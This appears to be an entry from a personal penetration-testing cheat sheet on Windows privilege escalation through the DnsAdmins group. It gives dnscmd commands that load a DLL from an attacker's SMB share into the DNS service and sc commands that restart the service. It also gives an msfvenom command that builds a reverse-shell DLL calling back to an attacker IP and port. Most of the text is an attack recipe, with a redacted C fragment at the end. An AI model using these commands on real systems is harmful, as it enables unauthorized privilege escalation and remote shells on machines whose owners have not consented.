Malicious DLL Injection

dns, privesc, windows

Overview #

If low privileged user is a member of DnsAdmins, attacker can inject a malicuous DLL in DNS service and achieve privilege escalation.

Environment Setup and Requirements #

Steps #

# load
dnscmd /config /serverlevelplugindll \\10.10.14.31\share\Win32Project1.dll

# verify
dnscmd /config /serverlevelplugindll \\10.10.14.31\share\Win32Project1.dll

# stop dns
cmd /c sc stop dns

# start dns
cmd /c sc start dns

Troubleshooting #

msfvenom -p windows/shell/reverse_tcp LHOST=10.10.14.31 LPORT=4444 -f dll > evil.dll

// [..redacted...]
	WSACleanup();
	return 0;
}

References #